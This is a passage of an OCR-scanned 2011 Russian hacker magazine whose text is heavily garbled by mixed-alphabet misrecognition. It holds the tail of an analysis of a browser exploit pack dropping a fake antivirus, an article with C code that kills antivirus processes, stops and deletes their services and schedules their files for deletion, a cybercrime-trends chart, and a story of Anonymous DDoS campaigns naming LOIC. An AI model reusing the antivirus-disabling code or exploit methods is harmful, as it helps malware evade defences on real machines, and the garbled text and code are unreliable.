только целые, а еще и вещественные (ѵ* 1 ,22222) . Таким образом, 
к этим числам нужно применить метод ІтотСЬагСосІе, который 
преобразовывает число в АЫЗІ-символ. Это и происходит в коде, 
расположенном на предпоследней строке. Однако не все так про- 
сто — строки еѵаі и ІтотСЬагСосІе получаются путем использования 
хитрых манипуляций. А именно — к объекту боситепі добавляет- 
ся стиль, к которому в поле іппегРІТМІ_ прибавляется строка #ѵа 
{ЬаскдгоипбшгКбаІаі.гіпдТгоппДІпагСо)}. Далее из этой строки дер- 
гаются символы ѵа для сборки еѵаі и гіпдТгот4СИагСо для сборки 




ІтотСЬагСосІе. Что же получается на выходе после еѵаі’ а? А как раз 
тот документ, который и будет непосредственно запускать эксплойты 
Я сохранил вывод после еѵаі’ а в отдельный файл и приступил к его 
анализу. Файл начинается со следующей строки: 



сІоситеп1:.ыпі1:е( 

’ <сеп1;ег><б1>404 ІМоІ: РоипсІ</б1></сеп1:ег><бп> ’ ) ; 

Таким образом, на страницу выводится классическое сообщение 
об ошибке 404, хотя со страницей, очевидно, все в порядке. Это 
еще одна уловка, чтобы пользователь ничего не заподозрил. На 
первый взгляд, кода в ЫтГке оказалось достаточно много, одна- 
ко обфускация практически отсутствовала, а большую его часть 
занимали разнообразные проверки версий плагинов и создание 
объектов. 

Запуск эксплойтов тривиален, поэтому эту часть я решил опустить 
и перейти непосредственно к описанию каждого из них. Для 
начала приведу список уязвимостей, которые эксплуатируются: 
СѴЕ-201 0-1 885, СѴЕ-201 0-4452, СѴЕ-201 0-3552, АОСЮВ.Бігеат и 
СѴЕ-201 0-0188. Начну с самого простого. 

СѴЕ-2010-1885 

Первый подопытный — ѴВ5-скрипт, эксплуатирующий уязвимость 
в АООВВ.Эігеапп, исправленную еще в середине 2004 (!) года. 
Выполнен он типично для такого рода скриптов — слегка обфус- 
цирован и не более того. Например, часть строк была подвержена 
реверсу. Его функционал заключается в загрузке и запуске фай- 
лов из интернета. Но как тебе известно из системных сообщений, 
файлы из интернета могут быть не только полезны, но и опасны :). 
Для реализации описанного функционала используются объекты 
М5ХМІ_2.ХМІ_НТТР, АООВВ.Эігеапп и ѴѴ5СгірІ. Любопытно, что эта 
уязвимость стара как мир, но до сих пор используется. 
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рис. 4. Фрагмент ѴВЗ-скрипта, эксплуатирующего уязвимость в АОООВ.Зігеат 



СѴЕ-2010-4452 

Следующий исследуемый образец — эксплойт, использующий СѴЕ- 
2010-4452. Эта уязвимость была официально опубликована Огасіе в 
середине февраля этого года. С ее помощью можно загрузить баѵа- 
апплет и исполнить его в обход системы безопасности. Для этого 
нужно заполнить поля собе и собеЬазе тэга <аррІеІ> специальным 
образом. Одна из особенностей этого эксплойта заключается в том, 
что адрес, по которому производится загрузка, представляет собой 
двойное слово в десятичной системе исчисления. Поясню: браузер 
переведет это число в ІР-адрес автоматически. То есть, если перей- 
ти по адресу Ыір://1476066051 . то браузер успешно откроет страни- 
цу популярного российского поисковика. 

СѴЕ-2010-3552 

Следующий эксплойт, удостоенный чести быть разобранным, 
использует уязвимость СѴЕ-2010-3552. Дыра опять-таки расположе- 
на в баѵа Рипііте ЕпѵігоптепТ Эксплуатируется она элементарно 
— если баѵа-апплет запускается с параметром 1аипсЬ|'п1р, то загруз- 
чик копирует строку из поля босбазе в стэковый буфер при помощи 
функции зргіпіТ. Думаю, что дальше пояснять не нужно. Шелл-код 
также не представляет особенного интереса — вначале идет стан- 
дартное получение кегпе132 через РЕВ: 
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Далее происходит получение адресов АРІ-функций по их хэшам (см. 
рис. 8.). Завершающий этап — скачивание файла из игітоп.біі при 
помощи ІЭ РЮоѵѵпІоасІТоРіІе, и затем — его запуск. 

Эксплойт 
Сеп+ег 

На подходе следующий эксплойт, который использует уязвимость 
в весьма экзотическом компоненте ОС ѴѴіпбоѵѵз — Неір апб 
Виррогі Сепіег. Фишка в том, что для доступа к онлайн-ресурсам 



для Неір апсі Биррогі 



рис. 5. Фрагмент эксплойта, использующего СѴЕ-2010-1885 
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рис. 6. Фрагмент ЧаѵаЗсгірі'а, эксплуатирующего СѴЕ- 
2010-1088 
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рис. 8. Фрагмент шеллкода, выполняющий получение 
адресов АРІ-функций по их контрольным суммам 



этот компонент использует специальный адрес, начинающийся 
с Ьср ://. А теперь о самом эксплойте — он основан на техни- 
ке сокрытия кода, аналогичной той, что использует первичная 
ЫтГка, которая разбиралась в самом начале. Здесь так же, как 
и там, используется тэг <біѵ> в качестве контейнера данных. 
Обфускация тоже применена аналогичная. Итак, быстро рас- 
шифровав «первый слой», я увидел непосредственно эксплойт, 
использующий СѴЕ-20 10-1 885 (см. рис. 5). 

Первое, что бросилось в глаза — адрес, начинающийся с Ьср :// и 
обилие повторяющихся символов %А. А второе — разнообразные 
строки, отвечающие за скачивание и запуск файла: ЗаѵеТоРіІе, ѲЕТ, 
АбобЬ.Эігеат, ѴѴзЬБЬеІІ.Рип, М5ХМІ_2.ХМШТТР и так далее. Там же 
находятся ссылка на скачиваемый файл и его локальное название 
на жестком диске. Таким образом, суть и этого эксплойта сводится к 
тому, чтобы просто скачать и запустить файл. 



Эксплойт под АсІоЬе Веасіег 
и АаоЬе АсгоЬаі 



На очереди остался последний компонент, представляющий собой 
РОЕ-документ, а для концовки я оставил РЕ’шник, который скачива- 
ется всеми упомянутыми в статье эксплойтами. Итак, аплодисменты: 
замыкает наш хит-парад эксплойт под АбоЬе Реабег и АбоЬе АсгоЬаі. 
Как я уже упоминал выше — это РОР’ка. В ней содержится ХРА- 
шаблон и код на баѵаЗсгірІ. Шаблон выглядит следующим образом: 



<1:етр1а1:е хт1п5="Ы:1:р://ыыы.х-Ра.ог§/5СІіета/х-Ра-1;етр1а1:е/2.5/ ,, > 
кзиЬ-Рогт Іауоіг^'ЧЬ" 1оса1е="еп_и5" пате="а5-Раем-р"> 
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рис. 7. Фрагмент кода «целевого» исполняемого файла 



<ра§е5е1:> 

<ра§еАгеа іб^го^еУот" пате="го1:еѴот"> 

<соп1:еп1:Агеа Ь= ,, 756р1: ,, м=" ЗУбрѣ" х="0.25іп" у="0. 25іп"/> 
стебіит 1оп§= ,, 792р1: ,, 5Иоп1:= " 612р1: " 5І:оск= ,, сІе-Раи11: ,, /> 
</ра§еАгеа> 

</ра§е5е1:> 

кзиЬ-Рогт I^= ,, 756р1: ,, ^"ЗУбр*" пате="діл/§іл/д§іл/д§"> 

<бе1б Ь="65тт" пате="-РаѵыыЬы" ы="85тт" х="53 . 6501тт" 
у="88.6499тт"> 

кеѵепі: ас'Ьіѵі'Ьу^'іпі'ЬіаІіге" пате="1охКо1:е ,, > 
кзсгірі: соп1:еп1:Туре= ,, арр1іса1;іоп/х-]аѵа5Сгір1: ,, > 

Как видишь, здесь создается зиЫогт и радеАгеа, а в первом 
еще и располагается скрипт, который будет вызываться при 
открытии документа. То есть при вызове события іпіііаііге, кото- 
рое указано в 'еѵепі асІіѵіІу='. 

Больше в файле ничего интересного я не обнаружил. Скрипт 
выполнен способом, аналогичным тому, что я описывал уже два 
раза выше по тексту. После расшифровки данных в <біѵ> передо 
мной предстали два шелл-кода. Каждый их них предназначен 
для определенной версии продукта АбоЬе, под которым запущен 
документ. В шеллкодах опять же реализуется загрузка испол- 
няемого файла, а сама уязвимость проявляется при записи в 
ІаѵѵѵѵѵЬѵѵ.гаѵѵѴаІие (по поводу баѵѵѵѵѵЬѵѵ — смотри чуть выше) спе- 
циально сформированного ТІЕЕ-изображения. 

Ковыряем сам экзешник 

Итак, с эксплойт-паком покончено. А на закуску — исполняемый 
файл (см. рис. 7), который все так упорно пытаются скачать и запу- 
стить. Это оказался типичный лжеантивирус. Запакован он ІіРХ’ом, 
который я успешно снял при помощи 'ирх -б', и защищен неким 
протектором. Как обычно, использована обфускация и антиэмуля- 
ция. 

Заключение 

В итоге оказалось, что все ухищрения применяются лишь для того, 
чтобы установить на компьютер поддельный антивирус. Который и 
будет выкачивать деньги с напуганного и введенного в заблужде- 
ние пользователя. Любопытно, что уязвимости используются явно 
не первой свежести, так что лучше следить за обновлениями попу- 
лярного софта :). т 
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МАІЛЛ/АРЕ 



■ Артем РапкоР Смирнов 



(ах-зоН.ш) 




ВЕСІЫЫЕР5 ЕйІТІОЫ 



ШАЛОСТИ 
С АНТИВИРУСАМИ 



Испытываем базовую устойчивость АѴ6, Тгепб 
Місго и Місгозоп Бесипіу Е$$епІіаІ$ 

© Сегодня вместо брутальных низкоуровневых опытов от наших 
краш-лаборантов тебя ждет легкая прогулка по спинам трех извест- 
ных за рубежом антивирусных продуктов. Только простые трюки, 
только высокоуровневый кодинг. Но переживут ли они эти экспери- 
менты? 



Кто на новенького? 

Тестировать мы будем три не очень популярных в России, но 
достойных антивируса, причем два из них — бесплатные. Итак, 

ВОТ СПИСОК: 

• Тгепб Місго — американо-японский продукт. На российском 
рынке занимал четвертое место по популярности в 2007 году. 

• АѴ6 Іпіегпеі Зесигііу 201 1 (бесплатная версия) — чешская 
система защиты, включающая в себя антивирус. 



• Місгобоіі Зесигііу Еззепііаіз -бесплатный антивирус от мало- 
известной американской софтверной компании. 

Подготовка 

В первую очередь необходимо настроить стенд для тестирова- 
ния. Тестировать, а тем более «убивать» антивирусное ПО на 
рабочей машине — не самая хорошая идея. Тем не менее, вто- 
рого (ненужного) компьютера у меня нет, поэтому я решил пойти 
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Слишком перегруженный интерфейс АѴ6 



самым очевидным способом — экспериментировать 
на виртуальной машине. 

В качестве ПО для виртуализации я использую 
Огасіе ѴИиаІВох с установленным на нем ѴѴіпсІоѵѵз 
ХР 5РЗ. Кодить мы будем на локальной машине, а 
запускать и отлаживать приложение — на виртуаль- 
ной. 

Для начала настроим виртуальную машину. Чтобы 
она была доступна с хоста, нужно настроить второе 
сетевое соединение. Сетевой адаптер должен иметь 
тип «Виртуальный адаптер хоста» («ѴИиаІВох Нозі- 
опіу Еібегпеі абаріег»). После загрузки ОС второй 
адаптер получит адрес из подсети 192.168.56.0/24. 

В моем случае адрес был 192.168.56.102. Далее рас- 
шариваем папку на машине — я выбрал С:\5Ьаге\ 
[искАѵ. 

В качестве ЮЕ я использую Ѵізиаі Зіисііо 2010, в ком- 
плекте с которой имеется весьма неплохой удален- 
ный отладчик. Открывай свойства проекта, выбирай 
пункт ОеЬиддіпд. 

• ОеЬиддег Іо Іаипсб — Реппоіе ѴѴіпсІоѵѵз ОеЬиддег; 

• Ретоіе СоттапсІ — СЛЗбагеѴискАѵДискАѵ.ехе; 

• ѴѴогкіпд бігесіогу — СЛЗИагеѴискАѵ; 

• Ретоіе Зегѵег ІЧате — 192.168.56.102; 

• Соппесііоп — Ретоіе ѵѵііб по аиібепіісаііоп (Ыаііѵе 
ОПІу) ; 

• ОеЬиддег Туре — Ыаііѵе ОпІу. 

Также на виртуалку надо скопировать директорию 
х86 из директории удаленного отладчика, после чего 
запустить тзѵзппоп.ехе. 

После этого софт будет запускаться на виртуальной 
машине, несмотря на то, что ЮЕ запущена на локаль- 
ном компьютере. 

Главное правило — 
никаких правил 

Цель тестирования элементарна — «вынести» анти- 
вирус любым легальным (или не очень) способом. Я 
использую следующие методы: 

• Самое первое, что мы попытаемся сделать — убить 
графический интерфейс антивируса, чтобы он не мог 
взаимодействовать с пользователем. 

• Второй этап — убийство сервиса антивируса. 

• Третий этап — попытка удалить содержимое папки 
антивируса (или хотя бы часть содержимого). 
Небольшая оговорка — все действия производятся 
из изег-ппосіе с правами администратора. За каждый 
тест испытуемый может получить от 2 до 5 баллов — 
прямо как в школе. 




Еріс РаіІ детища МісгозоЙ 



Без лица 

Графика убивается самым элементарным спосо- 
бом. Антивирусы обычно держат графическую часть 
в отдельном процессе, который мы и попытаемся 
завершить. Функция для убийства гуя проста, как три 
копейки: 

Ьоо кі11Ргосе55ВуРЮ( іпѣ РЮ) 

{ 

геііигп Тегтіпа1:еРгосе55(0репРгосе55( 

5ѴІЧСНКСШ2Е | Р КОС Е 5 5_Т Е КМІ N АТ Е , -Раіве, РЮ), 
0 ); 

} 

В общем, получаем хэндл процесса с правами 
5ѴІ\ІСНР0І\ІІ2Е и РР0СЕ85_ТЕРМІ ІЧАТЕ, а потом про- 
сто завершаем его. Как же повели себя подопытные? 
Первым будет детище мелкомягких — Місгозоіі 
Зесигііу Егзепііаіз. Оно, будучи уже вполне зрелым, 
даже не пискнуло при убийстве, за что и получа- 
ет уверенную двойку. Кстати, сегодня мы не будем 
делать никаких выводов и суммировать оценки. 
Говорят, в первом классе этим не занимаются :). 
Следующий на очереди — Тгепб Місго. Он дает убить 
процесс с главным окном, но за значок в трее отве- 
чает процесс, запущенный с привилегиями 5Ѵ5ТЕМ, 
соответственно, убить его из изегппосіе нельзя даже 
с правами администратора. Более того, после закры- 
тия главного окна можно щелкнуть на иконку в трее, 
и окно появится вновь. Я считаю, что Тгепб Місго 
заслуживает твердой «четверки» за этот тест. 

Далее идет АѴО. Он запускает два процесса от имени 
текущего пользователя: один отвечает за главное 
окно, второй — за иконку в трее. Главное окно убива- 
ется без проблем, а вот иконку убить не получается 
— Ассезз РепіесІ. Четверка. 




> сіѵсі 



На дискеты найдешь 
исходник в виде про- 
екта для Ѵізиаі Зіисііо 
2010 . 




> ѵѵагпіпд 

Будь осторожен, играя 
сантивирусами, и 
используй эту инфор- 
мациютолько для 
ознакомления. 



егѵіса Регтапепііу 
ІпаѵаиаЬІе 



Ладно, с графическим интерфейсом разобрались. 

Но то, что мы уничтожили графику, почти ничего не 
значит — служба антивируса по-прежнему бодрству- 
ет. Наша задача — остановить службу антивируса. 
Делается это нехитрой функцией, которую ты най- 
дешь на врезке. 
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МАІЛЛ/АРЕ 




Лаконичное и красивое окно ТгепсІ Місго 

Первым тестируем, опять же, Еззепііаіз. Вот уж чего не ожи- 
дал, так этого — наш подопытный провалил и этот тест, дав 
выгрузить свой сервис без лишних вопросов. «А что если...?» — 
подумал я, и вставил после остановки сервиса следующие две 
строки: 

іі ( геБиІІ: ) 

пезиіі: = 0е1еіе5егѵісе(5с5егѵісе) ; 

Затаив дыхание, запускаем... И что же мы видим? М3 5Е, ругаю- 
щийся на остановленный сервис. Ладно, нажимаем на большую 
красную кнопку посреди окна — и видим ошибку. Да, эта про- 
граммка разрешила удалить свою службу. Печально. Снова два 
балла. 

Проверяем ТгепсІ Місго — и ничего у нас не выходит. Он мони- 
торит вызов подобных функций, при этом дает открыть свой 
сервис с максимальными правами, но., при попытке остано- 
вить сервис мы получаем ошибку, причем ошибка — не просто 
ошибка доступа, а ЕПП0Р^ѴАІ_ІВ_5ЕРѴІСЕ^С0І\ІТВ0І_. С уда- 
лением сервиса все еще интереснее: ОеІеІеЗегѵісе возвращает 
Ігие, при этом с самим сервисом ничего не происходит. Что ж, 
похвально — пятерка. 

АѴѲ держит запущенными сразу 2 службы — аѵдѵѵсі и 
АѴѲЮЗАдеп!. Ни одну из них остановить не получается, с удале- 
нием ситуация аналогичная. Пятерка. 

РНе поі іоііпсі 

Последний тест я решил задействовать для очистки совести, 
полагая, что испытуемые не настолько тупы. Но, как оказалось, я 
ошибался. Функция такова: 

Ьоо' гетоѵеРо1сІег(соп5І: сЬаг *1і1е) 

{ 

геіигп МоѵеРіІеЕхШІе, ІМІАЩ МОѴЕРІІЕ_ОЕІАѴ_ШТІІ_КЕВООТ) ; 

} 

Напоминаю, вызов функции МоѵеЕіІеЕх с переданным в каче- 
стве второго параметра нулевым указателем означает не что 
иное, как удаление пути, указанного в первом параметре, а 
флаг МОѴЕЕІІ_Е_ВЕІ_АѴ_ІІІ\ІТІІ__РЕВООТ указывает системе, что 
файл нужно удалить в процессе перезагрузки. 

Это необходимо в связи с тем, что используемые в момент 
перемещения (удаления) файлы останутся на своих местах, а 
мы останемся с носом. Все, хватит болтовни — приступаем к 
делу. М3 Зесигііу Еззепііаіз не дает удалить ни файл своего 
сервиса, ни ѲІІІ’я. Так же, как и в случае с ТгепсІ Місго, воз- 



ОСТАНАВЛИВАЕМ СЕРВИС 



Ьоо] 5іорБегѵісе(соп5І: сЬаг *5ѵсІ\Іате) 

{ 

5С_НА 5сМапа§ег = І\ІІЛ_І_; 

5 С і зсБегѵісе = І\ІІЛ_І_; 

Ьооі гезиіі: = -Раізе; 

5ЕКѴІСЕ_5ТАТІІ5 55; 

5сМапа§ег = Ореп5СМапа§ег(І\ІІіи_ ,, ІМШ-Щ 
СЕІ\ІЕКІС_АІ_І_); 

ІТ ( ! 5сМапа§ег ) 

{ 

ргіпі-Р(" [-] Раііесі іо ореп 5СМапа§ег: %сІ\п'Ч 
СеіІ_а5іЕггог()); 

геіигп іаізе; 

} 

зсБегѵісе = 0реп5егѵісе(5сМапа§ег , зѵсІМате., 
СЕІ\ІЕКІС_АІ_І_); 

іі ( ! зсБегѵісе ) 

{ 

ргіпі-Р("[-] Раііесі іо ореп іЬе Бегѵісе: %сІ\п " ^ 
СеіІ_а5іЕггог()); 

геіигп ТаІ5е; 

} 

геБиІІ = Соп1:го15епѵісе(5с5егѵісе ^ 
5ЕКѴІСЕ_СОМТКОІ_5ТОР, &55); 

СІ05еБегѵісеНапсІ1е(5с5егѵісе); 

СІ05еБегѵісеНапсІ1е(5сМапа§ег); 

геіигг геБиІІ:; 

} 



вращается ошибка доступа. При этом ни один антивирус не 
завопил о подозрительном ехе’шнике, поэтому оба получают 
оценку 4. 

А вот тут непобедимый АѴ6 и спасовал — после выполнения 
строчки гетоѵеЕоІсІег("С:\\Ргодгапп Рі Іез\\АѴѲ\\АѴѲ 1 0\\аѵдиі. 
ехе"); и перезагрузки ОШ антивируса перестал запускаться, 
а файл отправился в глубины /беѵ/пиЦ. Пробуем удалить всю 
директорию антивируса и., директория осталась на своем 
месте, а службы запустились. Подопытный получает тройку. 

Вердикт 

В принципе, антивирусы держались неплохо, и откровенно 
стандартными средствами серьезно повредить их не удалось. 
«Порадовало» изделие от Майкрософт — как плохими резуль- 
татами нашего теста, так и реакцией их саппорта. При попытке 
сообщить о косяках они не захотели дать мне какой-нибудь 
контакт разработчиков, чтобы я мог рассказать им об этих 
дырах. 

На п-ном шаге переписки все же предложили передать инфор- 
мацию через них — ага, конечно же, передадут :). Второе, и 
самое важное: почему антивирусы не вопили, как бешеные, 
видя, что их собираются прикончить? Они запрещали удалять 
свои директории, останавливать службы, но почему ни один из 
них даже не заикнулся о подозрительном файле? □с 



► 074 



ХАКЕР 06 /149/ 201 1 






РОСТ доходов 



МАИЛ/АРЕ 



ТРЕНДЫ КИБЕРПРЕСТУПЛЕНИЙ 

Ущерб от киберпреступников ежегодно исчисляется сотнями 
миллионов долларов. Но какие сферы их деятельности наиболее 
прибыльны и показывают стабильный рост? 



В бизнесе есть такой инструмент как ВС6-матрица (название идет 
от названия компании, которая ее разработала - Возіоп СопзиШпд 
Вгоир). Зто специальная диаграмма с двумя параметрами: «Доля на 
рынке» и «Рост», на которой располагаются различные продукты 
компании. Зто позволяет владельцам бизнеса проанализировать, 
на какие сферы деятельности необходимо делать ставки, а от 



каких, возможно, стоит избавиться. Как это относится ко взлому? 
Аналитики из компании СІЗСО ежегодно составляют такую матрицу 
для рынка ІТ-преступлений, наглядно изображая наиболее актуаль- 
ные с точки зрения прибыльности, а также скорости и масштабно- 
сти распространения методы, которые используют злоумышленни- 
ки. Зто любопытно. 



С— 3 
-О 
со 



ТЕМНЫЕ ЛОШАДКИ 



? 



Атаки на Темы 

мобильные с ѴоІР- 
устройства телефонией 



СОБАКИ 






Атаки через 




социальные 




сети 


ОРоЗ-атаки 


Фишинг 



ЗВЕЗДЫ 



★ 



ДОЙНЫЕ КОРОВЫ 

К 



Спам 

«таблеток» 

(фарма) 




Скликивание 

рекламы 



Фейковые 

антивирусы 



МАЛЕНЬКАЯ 



ПРИБЫЛЬ 



> БОЛЬШАЯ 



«Дойные коровы». В эту кате- 
горию попали давно известные 
виды нелегального бизнеса. 
Преступники успешно продол- 
жают использовать зсагеѵѵаге 
(фейковые антивирусы), клик- 
фрод (автоматическое скликива- 
ние рекламы), спам с рекламой 
таблеток и так далее. Эта дея- 
тельность приносит много денег, 
но для нее не характерен актив- 
ный рост. 



«Звезды», это тоже очень при- 
быльные сферы деятельности 
преступников, но в отличие от 
«Дойных коров» они показывают 
еще и нешуточный рост. Сюда 
попали разработка/продажа 
веб-сплойтов, инструменты для 
кражи конфиденциальных дан- 
ных, а также сервисы по выводу 
средств, позволяющие легали- 
зовать деньги, полученные неза- 
конным путем. 



«Собаки». Категория включает 
сферы бизнеса с низкой рента- 
бельностью и низкими темпами 
роста. Денег приносят мало и не 
растут. Сюда попали: рассылка 
спама через социальные сети, 
старый добрый фишинг и, что 
может показаться удивительным 
после нескольких недавних пре- 
цедентов, ООоЭ-атаки. Но в то, 
что кто-то откажется от этого 
бизнеса, верится с трудом. 



«Темные лошадки». В раз- 
деле находятся направления 
черного бизнеса, которые пока 
не получили широкого распро- 
странения, но в перспективе 
могут либо выстрелить (стать 
«звездами»), либо не выстрелить 
(перейти в категорию «собак»). 
Специалисты СІ5С0 относят 
сюда атаки на ѴоІР и, конечно 
же, угрозы, связанные с мобиль- 
ными устройствами, т 
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■ ■ Мария «Міітііі» Нефедова (ті^гішагеаі. хакер. ги) 




ИМЯ НАМ - ЛЕГИОН 

АНОНИМУС НЕ ПРОЩАЕТ 

В ПОСЛЕДНЕЕ ВРЕМЯ «ШАЛОСТИ» АНОНИМУСОВ ПРИОБРЕТАЮТ АБСОЛЮТНО НЕДЕТСКИЙ РАЗ- 
МАХ. МАСШТАБНЫЕ КАМПАНИИ В ПОДДЕРЖКУ ѴѴІКНЕАКЗ, ТНЕ РІКАТЕ ВАУ, ДЖОРДЖА ХОТЦА, 
БОРЬБА С САЙЕНТОЛОГАМИ И ДРУГИЕ ДЕЯНИЯ АНОНОВ ПРИВЛЕКЛИ К НИМ ОБЩЕСТВЕННОЕ ВНИ- 
МАНИЕ, ВНИМАНИЕ ВЛАСТЕЙ И ПОРОДИЛИ НЕМАЛО ЛУЛЗОВ. СЕГОДНЯ МЫ РАССКАЖЕМ ТЕБЕ, 

НЕГО ЖЕ ИМЕННО НЕ ПРОЩАЕТ АНОНИМУС. 



Для тех, кто не в курсе 

Мы — аноним. Имя нам — легион. Мы не 
прощаем. Мы не забываем. Ждите нас. 

СМИ всего мира не так давно открыли для 
себя такое явление как Апопутоиз («ано- 
ним» — англ., однако в разговорном рус- 
ском прижилась и прямая транслитерация 
«анонимус»), и, похоже, журналисты до сих 
пор толком не понимают природы этого 
феномена. Очень забавно, знаешь ли, читать 
в каком-нибудь солидном издании о новых 
злодеяниях страшной «хакерской группи- 
ровки Апопутоиз». Дело в том, что никакой 
группировки, в общем-то, не существует. Нет, 
бесспорно, у анонимусов имеются свои коор- 
динаторы атак, заводилы и те, кого можно 
назвать лидерами... Однако, на наш взгляд, 
глупо искать четкий порядок в абсолютном 
хаосе. 

Откуда вообще взялись анонимы? В Сети это 
явление зародилось примерно в 2003 году, 
и на сегодня Апопутоиз довольно прочно 
ассоциируется в сознании людей с аноним- 
ными (ну надо же!) имеджбордами, вроде 
почившего 2сЬ и 4сЬап, с сайтами типа 
Луркмор и Епсусіоресііа Огатаііса, а также 
кучей других (опять же, анонимных) ресур- 
сов. Ничего странного в появлении таких 
мест в Сети нет. Сегодня правительства и 
правоохранительные органы большинства 
прогрессивных стран жаждут искоренить 
анонимность в интернете. Они хотят, чтобы 
люди регистрировались в социальных 
сетях и на форумах, заводили разного рода 
электронные карты, с помощью которых их 



можно отследить, «посчитать» и так далее. 

В ответ на все это у немалого числа людей 
рождается закономерный протест и желание 
«сделать все наоборот». К тому же нельзя 
не заметить, что на различных анонимных 
ресурсах царит довольно необычная атмос- 
фера — когда нет имен, никнеймов, репута- 
ции, ответственности за сказанное и каких- 
либо условностей, рождается... в общем-то, 
хаос и помойка, конечно, однако довольно 
любопытная :). Как пишет Лурк, «друже- 
ственная атмосфера интеллектуальной раз- 
вязности». Как ни странно, это тоже правда. 

Церковь Сайентологии 
и те Рігаіе Вау 

Пожалуй, впервые широкая общественность 
услышала о «группировке Апопутоиз» после 
их атаки на сайентологов. Если кто-то вдруг 
не знает, церковь Сайентологии — это дети- 
ще Рона Хаббарда, американского писателя- 
фантаста. Данная прикладная религиозная 
философия далеко не просто так запрещена 
во многих странах мира. По сути, это не что 
иное, как секта, притом весьма оригиналь- 
ная. Например, согласно вере сайентологов 
и тому, что Хаббард описал в формате кос- 
мооперы, — гуманоид Ксену 75 000 000 лет 
назад был военным диктатором и руководил 
«Галактической Империей». В ходе подавле- 
ния проявлений инакомыслия среди своего 
народа спровоцировал массовые протесты и, 
недолго думая, арестовал всех, кто принимал 
в них участие. Проштрафившихся привезли 
на планету Тиджиек (то есть, на Землю) и 



по прибытии разместили вокруг вулканов. 
После этого Ксену «покарал» неверных 
водородными бомбами, собрал их души и 
внедрил в тела людей. 

Но вернемся к нашим анонимам. Началось 
все с того, что в 2008 году сайентологи обви- 
нили ѴоиТиЬе в нарушении копирайта — на 
популярном видеохостинге было размещено 
пропагандистское видео с Томом Крузом 
(оно, кстати, доступно на ѴоиТиЬе до сих пор), 
снятое для внутреннего пользования и про- 
сочившееся в Сеть каким-то непонятным 
образом. Сайентологические видео с Томом 
Крузом, кстати сказать, вообще производят 
неизгладимое впечатление, будто смотришь 
утопическое кино или выступление Адольфа 
Гитлера — очень похожая экспрессия. Опять 
же, для тех, кто не знает, притязания сайен- 
тологов в целом простирались куда дальше 
ѴоиТиЬе, эти ребята вообще с радостью 
закрыли и запретили бы весь интернет. 

В ответ на выпады церкви Сайентологии 
в сторону Сети анонимусы решили встать 
на защиту ѴоиТиЬе и преподать сайенто- 
логам урок. Они объявили старт проекта 
«Чанология» (Ргоіесі: СЬапоІоду), провели 
серию ОБоЗ-атак на несколько сайентоло- 
гических сайтов, обвинили ЦС в попытке 
ввести в интернете цензуру и записали 
видеопослание на восьми языках, выложив 
его на все тот же ѴоиТиЬе. 

Двухминутное видео оставляет очень гнету- 
щее впечатление. Безжизненный синтези- 
рованный голос на фоне тревожно бегущих 
по небу облаков фактически объявляет войну 
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Еще один антисайентологический митинг 




Мегакругой специалист по Вы говорите «пиратство», 
информационной безопас- мы говорим — «свобода» 
ности Аарон Барр 



церкви Сайентологии. Анонимусы заявили в своем обращении, что 
«следят за всеми кампаниями дезинформации и подавления несо- 
гласных». «Во благо ваших последователей, во благо человечества 
и для нашего собственного удовольствия мы изгоним вас из интер- 
нета и методично демонтируем церковь Сайентологии в ее нынеш- 
нем виде», — говорится в послании. Заканчивается оно и вовсе 
зловеще: «Вам негде спрятаться, ибо мы — повсюду. Вы не найдете 
убежища, ибо на место каждого павшего из вас придут десять 
новых. Мы — ваши «подавляющие личности», но мы никогда не 
сможем оказывать и толики того деструктивного давления, которое 
оказывает ваш «Центр религиозной технологии». Знание — свобод- 
но. Мы — Аноним. Мы — легион. Мы не прощаем. Мы не забываем. 
Ждите нас.». 

Найти данный ролик на ѴоиТиЬе легко по запросу «послание к сай- 
ентологии». 




Вся символика у анонов 
очень говорящая 




©ршіііпп: ірярЬпск 



Операция «Расплата» 



Помимо этого, анонимы организовали масштабные протесты против 
церкви Сайентологии в 93-х городах по всему миру, в том числе в 
Лондоне, Бостоне, Чикаго, Париже, Дублине, Торонто и так далее. 
Многие участники этих акций скрывали свои лица под масками 
персонажа V из к/ф «V — значит вендетта». Это, без преувеличе- 
ния, один из символов безликого и вездесущего анонима. V очень 
тесно связан с Гаем Фоксом, английским дворянином-католиком, 
знаменитым участником Порохового заговора против английского и 
шотландского короля Якова I в 1605 году. Если ты не видел фильм, 
не читал комикс и не в курсе всех этих исторических параллелей, 
советуем ознакомиться с темой — она довольно интересна как сама 
по себе, так и в связи с анонимами. 

После этой выходки анонов о них заговорили СМИ. Началось все 
тогда с довольно смешных (в связи с полным непониманием темы) 
репортажей на ТВ и заметок в печатных изданиях. Кто бы мог поду- 
мать, что через пару лет все это покажется детской шалостью. 
Второй раз анонимус нанес массированный удар в 2009 году, во 
время нашумевшего судебного процесса по делу админов ТЬе Рігаіе 
Вау. После оглашения приговора (напоминаем, что суд признал 
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руководителем трекера виновными во всех 
смертных грехах), анонимы объявили о стар- 
те операции Ваііоиі. Это название в пере- 
воде с английского означает «аварийный 
прыжок с парашютом» — то есть, операция 
была запланирована и подготовлена на тот 
случай, если ребят признают виновными. 

17 апреля вердикт был зачитан, и операция 
началась. Главной мишенью атаки стала 
Международная федерация звукозаписы- 
вающей индустрии, а также юридическая 
компания МА05, представляющая в суде 
интересы Голливуда. 20 апреля, через три 
дня после оглашения вердикта, началась 
массированная ООоЗ-атака на их сайты 
Трі.огд . Трі.сот . Трі.зе и тадз.сот . Кроме 
этого, анонимы призвали всех отправлять 
черные факсы в офис МРАА (Ассоциацию 
кинокомпаний Америки) и в офис МА05, 
Монике Вадстед, представляющей интересы 
Голливуда. Мисс Вадстед, к слову, тоже ярый 
сайентолог. 

В операции тогда приняли участие по 
разным данным от 700 до 1000 человек. 
Координация действий осуществлялась 
сразу в четырех ІРС-каналах (кстати, аноны в 
основном используют для таких целей имен- 
но ІРС, а также Тѵѵіиег): ігс.апоппеГогд #1рЬ, 
ігс.гаісІсЬап.огд #зеесІ5оШЬег1:у, ігс.апоппеГ 
огд #888сбап, ігсТгеепосІе.пеІ: #бискі1 : рі. 

Для атак тогда использовался (и по сей день 
используется) простейший софт типа І_ОІС 
(І_оѵѵ ОгЬМ; Іоп Саппоп) — проги, написан- 
ной на С# умельцами с 4СЬап. Приложение 
работает по принципу пентестерских про- 
грамм, предназначенных для стресс-тестов 
сайтов. Оно генерирует достаточно ТСР-, 
ШР- или НТТР-запросов единовременно, 
чтобы рухнуло что угодно. И, что особенно 
важно, разобраться с ним сможет даже 
школьник. Когда І_ОІС или нечто подобное 
запускают одновременно сотни людей, это 
